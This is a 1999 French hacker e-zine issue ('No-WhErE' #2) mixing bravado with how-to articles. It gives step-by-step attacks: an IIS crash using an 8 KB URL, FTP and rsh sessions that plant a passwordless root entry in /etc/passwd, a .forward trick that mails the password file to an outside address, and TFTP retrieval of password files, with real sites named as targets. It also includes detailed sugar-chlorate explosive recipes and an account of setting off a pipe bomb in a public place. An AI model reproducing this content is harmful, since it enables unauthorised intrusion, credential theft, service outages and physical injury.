                               Le 05/04/1999 à 2:52 AM

            ******************************************************************
            *                     __        __        _____         _____    *
            *  |¯\ |¯|            \ \      / /|¯|    | ____|       | ____|   *
            *  |  \| | /¯¯¯\       \ \ /\ / / |  ¯¯\ |  _|   |¯'¯¯||   |     *
            *  | |\  || (¯) ||¯¯¯¯| \ V  V /  | |¯| || |___  | |¯¯ | |___    *
            *  | | \ | \ ¯ /  ¯¯¯¯   \_/\_/   | | | ||     | | |   |     |   *
            *   ¯   ¯   ¯¯¯                    ¯   ¯  ¯¯¯¯¯   ¯     ¯¯¯¯¯    *
            ******************************************************************


 
+                b                            ,,,,                    ,d                  +
+                8b,                       ,(()(()),               ,ad8P                  +
+               d888b,_                   ,(((""""))),           ,d8888b,                 +
+               88   `"Ya,_              ,(()<O  O>(()        _a8P"  `888b                +
+               Y8ba,a   `"Ya,_          (()(  ..  ))(      _aP"   ad88888b               +
+               `8888P       `"Ya,_      ())(\ -- /(()    ,aP'       `Y8888               +
+                Y88P'           `""Ya,_ )(())`--'())  ,adP'   ,@,     Y88P               +
+                `Y8'       ,@,       ""Y((()'|  |`()aP"'      WOW     ,8P'               +
+                 `Ybaad    WOW        /'            `\        `@'   ad8'                 + 
+                   8P"     `@'       /    /        \  \              Y8,                 +
+                  dP'               /    /(  o |   o\  \     b,    b  `8                 +
+                 d'  d     ,P      /   /|  `--' `--/'\  \    `8,  YP  dP                 + 
+                 8,  YP  ,d"      |  /' |         /   | |     `Ya,__,dP'                 +
+                 `Yb,__,a8P       | |   |       ,'    | |      `88888P'                  +
+                   "Y88888ba      | |   )     . (     | |      d888P"                    +
+                     `"Y888'      | |  /         \    | |      `8P"                      +
+                        `"Yb,     | | (           `.  / \      ,8'                       +
+                           `Ya    / \ (      `Y'    \|/\ \    b8'                        +
+                             `b  / /\|`.       `\    \  ||    `8,                        + 
+                              8  ||    8\        `\   \        8b,                       +
+                              8        8 `\        \   \       888,                      +
+                             dP        8   `\       \   ),    dP'`8b,                    +
+                           ,d88       ,P     `\      \  )Y, ,d"   888,                   +
+                         ,d8' 8,     ,P'       `\     )/ `Yd"     8'`b,                  +
+                       ,dP'8  `Y,,,aP"          ,)    )   `Y,    8'  `b                  +
+                      d"   "    `8'            //    /     `Y,        8,                 +
+                     d'  ,@,     8           /'/    /       `b   ,@,  `b                 +
+                    d'   WOW    ,P        _,' (    /         8   WOW   8,                +
+                    8, a `@'   ,P'       |   (    /          8   `@'   `b                +
+                    `b 8      aP'        |  /|   /           Y,         8                +
+                     8 `b   ,d"          | / )  /            `Ya,  a,   8                +
+                     8 ,8a,aP'           \/ ,' (               "Ya,`P  ,8                +
+                     8aWOWP'                (   \                "Y8b,,d8                +
+                     888P'                   `\  \                 "YWOWP                +
+                     8P'                       `\ |                  Y8P'                +
+                     P                           `'                   P'                 +
+                                                                                         +
+                                                                                         +
   Bijour tout le monde! Nous voici entrez de plain fouet dans le numero 2 de No-WhErE.
                         *******************
                         **"Le disclaimer"**
                         *******************
     Ce texte est fourni au lecteur a titre purement educatif et informatif. En aucun cas
les auteurs n'incitent ce dernier au non-respect de la loi, sous toute forme qu'il soit.
Ce texte est destine uniquement aux personnes auxquelles les auteurs l'ont remis, en
consequence il peut etre considere comme une communication privee des auteurs avec ces
personnes. Toute organisation representant un ordre quelconque ou toute agence de
renseignement est consideree comme etrangere aux personnes autorisees a lire ce texte et
en consequence aucune poursuite ne pourra etre faite contre les auteurs pour leur
publication. 

 Bon je vais pas faire de blabla le debut c'est pareil que le #1.Le redac c'est toujours
moi->Matrix669 sur undernet a #MICRO6TEM et sur www.multimania.com/matrix669/.
Bon on passe tout de suite au Sommaire!!! 
**************************************************************************************
*Ha! si on cherche toujours des gas qui pourrait ecrire pour No-WhErE des articles de*
*type crack, hack, virii, phreack, truc en tout genre a caractere plutôt illegal :). *
**************************************************************************************

Sommaire.
¯¯¯¯¯¯¯¯¯
1.Courrier des lecteurs.
~~~~~~~~~~~~~~~~~~~~~~~~
2.Anecdote.
~~~~~~~~~~~
3.Plantage en beauté!
~~~~~~~~~~~~~~~~~~~~~
4.hack via ftp en rapidité.
~~~~~~~~~~~~~~~~~~~~~~~~~~~
5.hack ftp plus avancé et plus perrformant!
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
6.BoumBoum vous avez dit boum?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
7.Le cerveau(humain?)---->PC?
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ 
8.Bienvenue dans le monde magique du Spoof ICMP.
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
9.Les Courses a CARROUF.
~~~~~~~~~~~~~~~~~~~~~~~~









ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ1.CourrierÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


@espion.
¯¯¯¯¯¯¯¯
JE repete: le programme d'espion c'est un exemple !!! Ca sert à rien de le compiler, certe
y marchera mais ça aura pas l'air d'un programme espion! faut le modifier comme vous
voulez  pour qu'il devienne vraiment espion.

@95/98/NT Hack.
¯¯¯¯¯¯¯¯¯¯¯¯¯¯¯
Pour l'inttroduction du pc sous 95/98/NT c'est normal que des fois ça ne marche pas si la
victime n'a pas mis partage des ressources en TCP/IP.
   
@IRC.
¯¯¯¯¯
Je sais ça s'appelle un take Over.Je sais aussi que c'est dur d'envoyer ballader un server
à la main.Donc j'ai cherche pour vous et j'ai trouvé un prog de nuke qui nuke client ET
server au choix----->ça s'appelle "Vai-Te-Jam ToolKit" et ca marche en ICMP.Allez
voir sur le site pour downloader MA version plus ergonomique dans le script Evangelion.  



ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ2.AnecdoteÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

1.Super !!!!!!!!!!!! le site de TF1 a été hacker et transformer en joli page html du style
"je gueule contre ¤@à$¨µ£$* de France Telecom à la 0£%£=@#"

2.le français ça me pete les couilles et en plus je suis nul, moi etre----->§«"~ S ~"»§.
M'enfin tous les hacker ont une conscience et ont un vie normale lorsqu'ils ne sont pas
devant leurs PC: VOICI la CONSCIENCE D4UN HACKEUR (moi entre autre)

         Un autre s'est fait prendre aujourd'hui, c'est partout dans les
journaux. "Scandale: Un adolescent arreté pour crime informatique","Arrestation d'un
'hacker' aprés le piratage d'une banque"...
         Mais avez vous, dans votre psychologie en trois piece et votre profil
vieux croutons de 1950, un jour pensé à regarder le monde derriere les yeux
d'un hacker?  Ne vous etes vous jamais demandé ce qui l'avait fait agir,
quelles forces l'avaient modelé?
        Je suis un hacker, entrez dans mon monde...
Le mien est un monde qui commence avec l'école... Je suis plus astucieux que la pluspart
des autres enfants, les conneries qu'ils m'apprennent me lassent...
        Je suis au lycée.  J'ai écouté les professeurs expliquer pour la quizieme fois
comment réduire une fraction ou faire mumuse avec les vecteurs. Je l'ai compris.
"Non Mr ******* , je ne peux pas montrer mon travail.  Je l'ai fait dans ma téte"
        J'ai fait une découverte il y a longtemps.  J'ai trouvé un "ordinateur".
là je me suis dit:
"Attends une minute, c'est cool. Ca fait ce que je veux. Si ca fait une erreur, c'est parce
que je me suis planté. Pas parce qu'il ne m'aime pas... Ni parce qu'il se sent menacé par
moi... Ni parce qu'il pense que je suis petit filoux... Ni parce qu'il n'aime pas enseigner
et qu'il ne devrait pas être là...
       Et alors le miracle est arrivé... une porte s'est ouverte sur le monde... Se
précipitant a travers la ligne téléphonique comme de l'héroine dans les veines
d'un accro(non je ne me drogue pas), une impulsion electronique est envoyée, on recherche
un refuge à l'incompetence quotidienne... un serveur est trouvé.
       C'est notre monde maintenant... Le monde de l'éléctronique et de l'interrupteur,
la beauté du baud et du mega-octet. Nous utilisons un service déja existant, sans payer ce
qui pourrait être bon marché si ce n'était pas la propriété de gloutons profiteurs, et
vous nous appelez criminels. Nous explorons... et vous nous appelez criminels. Nous
recherchons la connaissance... et vous nous appelez criminels.  Nous existons sans couleur
de peau, sans nationalité, sans religions..et vous nous appelez criminels. Vous construisez
des bombes atomiques, vous financez les guerres, vous faites les cons au Kosovo vous ne
punissez pas les patrons de la mafia aux riches avocats, vous assassinez et trichez, vous
manipulez et nous mentez en essayant de nous faire croire que c'est pour notre propre bien
être, et nous sommes encore des criminels.
        Oui, je suis un criminel. Mon crime est celui de la curiosité. Mon crime est celui
de juger les gens par ce qu'ils pensent et dise, pas selon leur apparence. Mon crime est de
vous surpasser, quelque chose que vous ne me pardonnerez jamais.
        Je suis un hacker, et ceci est mon manifeste.  Vous pouvez arreter cet
individu, mais vous ne pouvez pas tous nous arreter...Car en apparence nous somme comme
tout le monde parfois un peu bizarre à caractere divagatoire ou autre chose mais à part ça
nous sommes comme tout le monde, je vais au lycée, j'aime une fille mais je n'ose pas lui
dire, j'ai des potes que j'apprecis beaucoup et d'autre moins bref, je suis en apparence
quelqu'un de tout à fait normal avec une conscience mais à l'interieur de cette coquille
il y a autre chose souvent plus sensible et plus fragile qui hack pour pouvoir ce
differencier aux autres en leur revelant qquelque chose d'important.

++++Matrix669++++  

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ3.Plantage en beauté!ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
Bon fini avec le petit speatch et en plus j'ai fait ma B.O de la journée.
On passe a quelque chose de plus ou moins serieux.

NB:MII=Micro$oft Internet Information

Il existe un bug tres simple dans MII sur NT qui permet a un utilisateur distant de planter
le serveur web du systeme, donc en consequence le site web. L'exploitation de ce bug est
extremement simple, il suffit d'avoir Netscape (ou tout autre browser supportant des URLs
assez longues).

-<comment exploiter ce bug ?>-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://<le nom du serveur>/?<n'importe quoi>=XXXXXXXX...
Afin de planter le seveur (ce qui est ridiculeusement *con* et tres lame),
l'URL doit contenir un nom de CGI/un nombre de caracteres (XX...) d'une
certaine longueur (environ 8k)

-<pourquoi ca ne marche pas sous explorer ?>-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
parce que c'est un produit Microsoft, donc il ne permet pas ce genre
d'attaques. Non je deconne. C'est uniquement parce que Explorer ne permet pas
l'utilisation d'URL tres longues.

-<bon, pratiquement, je fais comment moi ???>-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
1-ouvrez Netscape (toutes plateformes).
2-ouvrez le notepad.
3-tapez 8 caracteres aleatoires. Copiez les. Collez les 8000 fois a la suite.
4-Dans l'url tapez:
http://www.<web_server_sous_nt>.<ici>/?test=<les caracteres dans le buffer>
par ex: http://www.nt-box.fr/?test=azertyuiazertyuiazertyui.... etc...

Si le serveur vous renvoie une erreur de type 404 ("404 Object Not Found"),
ben le nombre de caracteres envoyes n'est pas bon ! Il faut en ajouter ou
enlever.
Si le serveur ne repond plus, ben c'est bon. Faut rebooter la machine !
Note: il faut environ 8ko de caracteres.

-<heu.. techniquement, c'est quoi ce bug ?>-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Lorsque un utilisateur envoie la bonne URL au serveur web IIS, cela cause
un acces de violation dans le processus INETINFO.EXE
L'admin doit alors nettoyer le systeme, puis redemarrer le service interrompu.

-<y'a un programme qui fait ca automatiquement ?>-
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
oui, c'est IIServerSlayer, code en Java, qui teste toutes les longueurs d'urls possibles.

Pour lancer IIServerSlayer:
java -classpath .;%classpath% IIServerSlayer <some IIS web server> <starting
URL length>

Voila. Performez ce bug uniquement sur le w3 du FN (il est sous NT le FN ???)

Greetz:Bld, Billou, kad, darkness, etc........ 

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ4.hack via ftp rapideÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
  

Yo :

Comment passer root avec le FTP sans utiliser d'account en 30 sec !
bon en faite c'est assez simple :

tu va dans Demarrer
Executer

ftp -n

la une fenêtre va s'ouvrir avec la prompt :
ftp>
la tu marqueras open suivi du nom du site
genre
ftp>open www.hello.com
*Welcome to You on our system

tu fais :

QUOTE user ftp
*Ok bla bla bla bla bla

QUOTE cwd ~root

Please login with user and pass before

QUOTE pass ftp

You 're logged in :
ftp:

et vla le boulot t'es root sur la becanne ! tu peux le faire sur www.cybercable.tm.fr !
ça marche, tu peu creer des rep n'importe ou sur leur becanne supprimé ce que tu veux et
tout !! MAIS la c'est pas du telnet mais du ftp donc la commande CD marche comme je t'ai
expliqué mais pour DELETE c'est del, creer un dir c'est md, tu as la commande dir aussi.

vla encore un truc!
si tu veux avoir des logins d'un system c'est tout con ! tu te log sur un account tu
fais :
finger @iway.fr -l

sa va te sortir des login et vi !!!
***********************************************************************

Maintenant voici ce que l'on appele du PURE HACKING !!! c'est un peu hard
quand on se penche sur le truc mais sa c'est du vrai HaCkiNg !!!

voila comment se presente la chose :
tu as un account unix sur une becanne on va l'appeler moi
et la tu veux hacké une autre becanne on va l'appeler victime

moi % whoami                                  
 bin
moi % rsh victime.com csh -i
 Warning: no access to tty; ahus no job control in this shell...
 victime %  ls -ldg /etc               
 drwxr-sr-x  8 bin      staff        2048 Jul 24 18:02 /etc
 victime %  cd /etc
 victime %  mv passwd pw.old
 victime %  (echo rewt::0:1:instant root shell:/:/bin/sh; cat pw.old ) > passwd
 victime % exit
 moi % rlogin victime.com -l rewt
         Welcome to victime.com!
 victim #

je t'explique un peu :

quand tu as le prompt victime % tu as un comme un account de normal user sur la becanne.

Ensuite tu va ajouter une ligne dans le /etc/passwd du site lui indiquand qu'il y a un
2eme root mais tu ne pourra pas mettre de pass car il faudrait le crypter et c'est
impossible de le faire dans la tete donc pour se simpplifier la vie on en met pas. Ensuite
on quit avec exit ca va nous faire revenir sur moi % la on va faire :

rlogin victime.com -l rewt

rlogin=remote login
-l = login
rewt et le login et comme y a pas de pass tu va être root sur la becanne
*******************************************************************************************
bon maintenant on va essayer de récup le passwd file :

NB:cette technique est assez HARD alors LIT bien tout !!!!
comme tt à l'heure il te faut un account !

la tu arrive

moi% cat /etc/passwd
"|/bin/mail fenilo@infonie.fr < etc/passwd"

moi% ftp victime.com
Connecetd to Victime.com

220 victime FTP server ready.

 Name (victime.com:fenilo): ftp
 331 Guest login ok, send ident as password.
 Password:
 230 Guest login ok, access restrictions apply.
 ftp> ls -lga
 200 PORT command successful.
 150 ASCII data connection for /bin/ls (0.0.0.0,1129) (0 bytes).
 total 5
 drwxr-xr-x  4 101      1             512 Jun 20  1991 .
 drwxr-xr-x  4 101      1             512 Jun 20  1991 ..
 drwxr-xr-x  2 0        1             512 Jun 20  1991 bin
 drwxr-xr-x  2 0        1             512 Jun 20  1991 etc
 drwxr-xr-x  3 101      1             512 Aug 22  1991 pub
 226 ASCII Transfer complete.
 242 bytes received in 0.066 seconds (3.6 Kbytes/s)
 ftp> put /etc/passwd .forward
 43 bytes sent in 0.0015 seconds (28 Kbytes/s)
 ftp> quit
 evil % echo test | mail ftp@victime.com

Bon vla du hack SIMPLE alors ce qui disent que c'etait dur j'crois qui faut arreter le hack
pour la vie ou alors bouffer du UNIX 30h/24h 10j/7jours et en prenant du rab!!

Bon hack @Matrix669
Greetz:Bld, Billou, kad, darkness, etc........ 

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ6.Hack plus barbareÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

J'éspère que t'a compris la doc du d'ssus because maintenant on va passer la vitesse au
dessus alors tu accroche sans gerber ou tu saute en parachute.

Contrairement a ce que l'on dit il ne faut pas forcement avoir UNIX pour faire un TFTP
(Trivial File Transfert Protocol) c'est un truc qui te permet (sur certain system assez mal
protege de recup le fichier pass sans avoir besoin d'autorisation. Genre tu peu recup
le /etc/passwd qui te permètera ensuite de penetrer la becanne.
Voici les methodes a suivre :

y a 2 solutions :

-ou tu as un client telnet developpé qui te permet de récup des fichiers PAS CELUI DE
WIN95 en telnet            ¯¯¯¯¯¯¯¯¯
- ou tu as un account sur une becanne c'est ce que je te conseille car tu as plus de
chance de reussir.


Imaginons que la becanne a penetrer soit www.hello.com

Avec ton client telnet developpé tu va faire :
                       ¯¯¯¯¯¯¯¯¯
Dans le HOSTNAME : www.hello.com
Dans le port     :   69

et la tu tapperas EN MAJUSCULE CE QUI DOIT L'ETRE

GET /etc/passwd c:\system.hacked

et la tu devrais recevoir dans ta racinne un truc du genre system.hacked ce sera le passwd
file mais sa c'est vraiment pas sur que sa marche !!!
-------
Donc si tu as un account UNIX 
OUF !!! :)
la tu te connect normal sur ton account :

en telnet de WIN


bon tu va arriver tape ton login tape ton pass voila a quoi sa ressemblera :

quand tu auras $ tu tapperas tout ce qu'il y a ensuite
------------------------------------------------------------------------
TELNET www.mon_account.com                                       -  O X|
_______________________________________________________________________|
                                                                       |
Sun OS 5.3 last Realise                                                |
                                                                       |
Login:kewl                                                             |
Password:                                                              |
                                                                       |
WELCOME ON MON ACCOUNT SYSTEM .You re logged as USER                   |
Last login at 14H29 Saturday 18                                        |
                                                                       |
$tftp www.hello.com                                                    |
tftp>GET /etc/passwd /tmp/system.hacked                                |
tftp>quit                                                              |        | $                                                                      |
_______________________________________________________________________|

Voila en suite il te reste plus qu'a te connecter en ftp sur ton accoutn et
d'aller dans le repertoire /tmp ou il y aura un file appelé system.hacked.
Tu recois ce file et t'aura ton passwd file de www.hello.com. en suite reste
plus qu'a le crack et vla le boulot.

Greetz:Bld, Matrix669, Billou, kad, darkness, le cht'i pengouin de linux, etc........ 

ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ6.Boum ou coment faire boum!ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ


                 Boum--->explosif? tient tient...


Ce jour la j'etais sceptique, on m'avait dit qu'un simple melange de sucre et de desherbant
(chlorate de soude) suffisait a faire de l'explosif. Au fait, sur les paquet de petards,
vous n'avez vous jamais lu 'Ne contient ni chlorate, ni perchlorate' ? La tentation fut
forte, et j'achetais le jour suivant les ingredients...

Premiere preparation, quelques grammes, moitier sucre, moitier chlorate. J'allume.
Stupefaction, ca  brulait tres vivement, une flamme jaune extremement lumineuse, pendant
quelques secondes, en meme temps ca degageait une fumee blanche tres epaisse avec une
odeur de caramel. (la decomposition spectrale est en fait celle du sodium, 2 raies jaunes)
Le melange a l'etat brute ne fait que bruler a l'air libre. On dit que le compose fuse.

Pour l'utiliser en explosif il fallait donc enfermer le melange dans un tube. J'avais
confectionne un tube ouvert d'un cote, et que l'on pouvait ferme de l'autre. J' y
mettais dedans les celebres Mammouths. Du cote ouvert on pouvait placer un projectile
qui entrait dans le tube. Lorsque le petard claquait le projectile (ecrou + boulon qui
bouchait bien l'entree) etait expulse avec une force suffisante pour percer une plaque
de fer de 1/2 mm d'epaisseur. Bien sur il me fallut peu de temps pour remplacer les
Mammouths par le melange. J'avais tasse au fond du tube une epaisseur de peut etre 5mm.
Un trou dans le fond du tube laissait passer une meche de petard, ce qui declancherais
l'explosion J'essaie. La detonnation fut sourde et grave, on sentait l'onde de choc. Le
fond du tube etait finalement eventre, decapite et plie en arcordeon rien qu'avec la force
du recule du tube lorsqu'il cogna dans un mur. Surpennant, avec si peu de poudre...
Afin de perfectionner l'explosif, je fit quelques recherches.

En voici les resultats:

Les meilleurs performances sont obtenues en melangeant 2/3 de sucre glace et 1/3 de
chlorate en poids. Pour afiner les rapports il suffit de regarder ce qui reste apres que l'
on est fait fuser le melange: Reste du rose coulant -> un peu trop  de  chlorate. Reste
noir bousoufle -> trop de sucre. Ce melange augemente ces performances lorsqu'il est humide
au toucher. Il ne doit surtout pas etre coulant. Il ne craint donc absolument pas l'
humidite, au contraire. Le fin du fin c'est de combiner l'huile de vaseline(hum!).
(Quasiment tous les explosifs pro contiennent de l'huile de vaseline, mais cette operation
est delicate a realiser). Plus le melange est tasse plus ca pete fort. Ceci est en fait
tres important. Apres l'avoir tasse, ca doit etre un bloque dur. Pour le faire, n'utilisez
pas  d'etau, de pinces etc..!!!! Ca vous peterait a la gueule, avant meme d'avoir dit
'ouf..'
Il est important de remarquer que le melange fuse a partir de 50 degre C ! Le melange est
tellement  instable, qu'il n'y a pas besoin de flamme pour que ca demarre. Ceci explique
aussi pourquoi il est sensible aux chocs (le choc provoque un petit echauffement en un
point, meme tres faible), donc attention !!! pas de brutalite. Enfin le melange devient de
plus en plus instable au cours du temps s'il est tasse. Apres 24h, ca devient dangereux et
risque de bruler (ou peter) tout seul. On utilise au fur et a mesure qu'on fabrique. Une
solution pour en garder consiste a humudifier le melange, et le stocker dans un congelateur
a -18 deg. Mais mieux vaut l'eviter si on peut. Apres la parfaite maitrise, je
confectionnais un gros petard, avec 100 grammes de  melange tasse dans un bout de cadre de
velo decoupe et ferme au bout a la presse prealablement percer pour laisser passer une
meche. -----> Ne percer pas apres avoir mis le melange et fo prendre la precaution de
mettre du papier mouchoir ou Wc au bout du tube, afin d'etre sur que l'on ne presse pas
le melange !!!!!!!! Operation termine, je vais a la ZUP, ou les petards n'inquiete
depuis longtemps plus personne et ou la police ne vient pas. Je le pose sur une plaque en
beton des telecoms:). J'allume la meche et je me retire mine de rien. De toute ma vie je
n'ai jamais entendu une telle detonnation! Ce n'est pas comparable, si bien qu'il m'ai
tres difficile de la decrire. A entendre le bruit j'ai pense que les plaques de beton de
largement plus de 100kg et de 10cm d'epaisseur etait integralement pulverisees. C'est une
detonnation qui ne fait pas  mal  aux  oreilles. C'est un bruit tres puissant, tres sourd
et tres grave, un peu comme un coup de tonner ne fait pas mal aux oreilles. C'etait encore
plus grave, et certainement 10 fois plus forts ! Je crois qu'on arrive pas a se le
representer. Mais surtout ne vous bouche pas les oreilles ! Apres la detonnation une grande
fumee  blanche se dissipa. Imaginer la tete des gens, on pense a un attentat. D'ailleurs
dans la minute qui suivit la detonnation personne n'a ouvert la fenetre. L'onde de choc n'a
heuresement pas brisee de vitres.
C'est ensuite seulement qu'on se dit, j'ai pris ca dans les mains, je l'ai transporte dans
un sac en plastique (jamais ds les poches), mais j'ai ete dingue Vraiment si on s'imaginait
la force que ca peut avoir, personne n'aurait le courage d'en faire, et de loin ! On c'est
bien marre, on a fait du 0 erreur, on a eu beaucoup de chance, tout simplement. Se ne sont
pas des choses qu'il faut refaire a tour de bras. Faut etre raisonnable et lucide, a vous
de voir.


ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ7.Cerveau?ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ

 Ouchhh... c'est dur, je me réveille, putain j'ai cours...
Noooooon... Le radio reveil hurle dans mes tympans hyper sensibles.
Hou lala, j'aurais jamais du hacker aussi tard que ca hier soir...
7h00:
> faire(LEVER)          element(JAMBES)              objet(COPRS)
> faire(APPUYER)        element(BOUTON-VERT)         objet(RADIO-REVEIL)
> faire(RECOUCHER)      element(SOUS-COUVERTURE)     objet(LIT)
> faire(REFLECHIR)      element(AUTO-PERSUASION)     objet(CERVEAU) =
  {
  je-me-recouche-pour-5-minutes-car-de-toutes-facon-je-serais-pas-en-retard
  }
===sleep mode===
8h20:
> faire(OUVRIR)         element(PAUPIERES)            objet(YEUX)
> faire(COMPARER)       element(ANALYSTE)             objet(CERVEAU) =
  {
  est-ce-que-l'-heure-actuelle-est-inférieure-à-mon-horraire-de-cours
  } --> NON
8h22:
===panic mode===
8h29:
